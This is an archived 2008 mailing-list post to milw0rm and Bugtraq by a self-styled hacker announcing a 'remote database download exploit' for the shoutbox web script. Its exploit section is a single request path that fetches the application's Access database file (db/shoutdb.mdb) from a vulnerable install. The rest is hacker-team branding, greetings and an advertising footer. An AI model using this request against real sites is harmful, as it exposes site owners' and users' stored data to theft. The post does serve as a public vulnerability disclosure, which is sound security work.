
Date: Wed, 30 Jul 2008 10:41:24 +0300
From: Ghost hacker <ghost-r00t@...mail.com>
To: ستروك <submit@...w0rm.com>,
	السيكروتي فوكس <bugtraq@...urityfocus.com>
Subject: shoutbox Remote Database Dawnload Exploit



##################################################################################################
 shoutbox Remote Database Dawnload Exploit
 Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
##################################################################################################
[~] Found by : Ghost Hacker                                    |,  .-.  .-.  ,|
[~] HomePage : http://gh0st10.wordpress.com                    | )(_o/  \o_)( |
[~] My Email : Ghost-r00t@...mail.com                          |/     /\     \|
[~] Name Script : shoutbox
[~] Download : http://www.designplace.org/download.php?file=shoutbox.zip
##################################################################################################
[~] Exploit :
http://xxxx.com/[path]/db/shoutdb.mdb
##################################################################################################
[~] Greetz :
Mr.SaFa7 & RoMaNcYxHaCkEr & Night Mare & All Members Real Hack & Arabs Security And All My Friends
##################################################################################################
 Viva Real hack Viva Real hack
##################################################################################################
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/